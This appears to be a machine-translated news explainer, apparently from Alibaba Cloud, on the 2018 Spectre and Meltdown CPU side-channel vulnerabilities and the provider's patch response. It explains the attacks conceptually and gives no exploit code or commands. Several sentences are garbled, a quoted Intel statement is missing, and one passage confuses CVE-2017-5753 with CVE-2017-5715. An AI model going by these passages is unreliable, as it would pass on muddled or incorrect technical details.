Two days ago, the Intel processor exploded a serious side channel attack vulnerability that could lead to information leaks across privileges.
The event continued to ferment. The next day, Intel said it was working with AMD, ARM and software vendors to solve the problem with a statement on CPU security vulnerabilities. At the same time, Intel says other companies' chips have the same problem. Technology giants such as Google, Microsoft and Amazon have also responded to the event.
In the statement, Intel said:
So, how big is the impact of this vulnerability? Ali Yun technical experts have been reading this.
1. What is the background of the event processor?
There are two main forms of attack that are officially named Spectre (ghost) and Meltdown (fusing). Spectre has 2 types of attack variants, and Meltdown has one, which is:
Variant 1: bypassing boundary check (CVE-2017-5753)
Variant 2: branch injection (CVE-2017-5715)
Variant 3: override data cache loading (CVE-2017-5754)
Before the formal lecture, first introduced the background knowledge of the processor.
Modern processors improve their processing capabilities by performing different tasks at the same time in each phase of the pipeline. In order to make this pipelining mechanism more efficient, modern processors introduce branch prediction and chaotic sequence execution mechanisms to perform more efficient operations.
Among them, the branch prediction is mainly used to improve the execution efficiency by predicting the execution of the target address code before the jump branch is fully identified. If the prediction fails, the pipeline will give up the wrong code and roll back the state.
And out of order execution by the execution order code. Improve the executive ability of parallel play.
These processor optimization techniques are of great help to the performance improvement of modern processors. But recent safety researchers have found that these functions of modern processor architecture may lead to security risks, which can be exploited by attackers in specific situations. The fundamental reason for this is that the recovery of the invalid execution state in the pipeline is incomplete, and the permissions check is incomplete when the sequence is executed. It also fully embodies the conflict of security design and performance design.
The side channel attacks that the Intel processor burst out are not a new topic. Security researchers have done a lot of research in this area and have published many research results. But the problem is easier to take advantage of, and has the actual attack effect, the impact of the greater.
The basic implementation of side channel attacks is to reverse some sensitive information through the use of shared resources.
The caching mechanism in modern processors is an important design to reduce the average time required for a processor to access memory. Through the caching mechanism, the processor will greatly save the memory access time when the data is calculated. The performance characteristics of caching mechanism are also used by security researchers to initiate side channel attacks, and determine whether data is in cache by observing data access performance, so that some sensitive information is released.
In addition to this, other processor sharing units, such as the jump target cache, can also be used for side channel attacks.
2, what is the impact of the loopholes in the end?
Spectre vulnerability CVE-2017-5753
The vulnerability is mainly through code of low privileged level, and high privileged level of code is called to implement the attack.
Because of the performance acceleration, the modern processor will do the branch prediction in advance, and the prior execution of misjudgment on the pipeline will not be actually executed. But also, for performance reasons, after the end of pipelined execution and no scene of all pre execution complete repair, resulting in the cache will leave traces of execution, further leads to low privilege by malicious software may leave branch prediction in the cache traces, guess high privilege data in specific code the case.
This vulnerability needs specific code mode to trigger, so attackers must find codes of specific patterns in highly privileged code, such as operation system kernel and virtualization base, to make use of CVE-2017-5715.
Spectre vulnerability CVE-2017-5715
For the vulnerability CVE-2017-5753, an attacker needs to find a specific code pattern that has already existed to expand the attack. If there is no ready-made attacker used to expand the code pattern of the attack, the attacker needs to consider how to create these easy to attack code patterns. The vulnerability CVE-2017-5715 is aimed at this idea.
The target of the attack here is the branch target cache. This is an internal data structure used to speed up branch jumps within a processor and has a specific target prediction algorithm. By manipulating this algorithm, attackers can pre fill in malicious jump addresses. When pipelined, the processor executes specific target code before the processor reaches the correct address. Of course, with the final validation of the pipeline, these executes are also abandoned, but the impact on the cache remains.
Google gives the KVM address module in attack details, but this attack has a strong dependence on the architecture of the processor and the algorithm of internal indirect branch prediction. In contrast, the vulnerability is the hardest to use, requiring certain prerequisites and many processor internal information.
Meltdown vulnerability CVE-2017-5754
It should be said that of the three vulnerabilities, Meltdown is the easiest to use and the most influential.
The essence of this vulnerability is because the processor does not restrict cross privileged data access when it is executed in a chaotic sequence. For example, when a user mode program to access the kernel data, finally will trigger the page access processor is abnormal, but the problem is, when the line is executed, the trigger page exception was suppressed, the real trigger in the processor page exception before the corresponding code will execute, the cache will still change.
Because the hidden danger involves most of the CPU models of Intel over the past 10 years, the security vulnerability has triggered an unprecedented technological crisis. For the sake of security, all the servers, personal computers and mobile phones on the market need to be upgraded. But it also needs to be seen that there is a threshold for this vulnerability, taking into account the performance degradation associated with the upgrading of CPU and the operating system. Different users can assess their own situation to make decisions.
It is worth mentioning that in this process, all cloud vendors are without exceptions to the fastest responding groups. On the one hand, it is responsible for the security of the customers on the platform, on the other hand, these platforms have gathered a large number of professional security engineers. So it is foreseeable that the cloud platform should be the first group in the industry to fix the problem.
It is reported that Ali cloud at the end of last year and Intel synchronization key safety information, based on many years of deep ploughing in the core area, the two sides continue to carry out joint verification of the restoration plan. As of this article, Ali cloud has not been determined to be affected, and there is no information that the existing customers have been attacked.
Considering that the impact of this event is very large, and is also accompanied by potential performance impact, the team has started the repair work, and is deploying the hot upgrade plan carefully, which does not affect the customer business under normal circumstances. It is known that some scenarios do not support the heat upgrade scheme. We will give further notice to the customers concerned.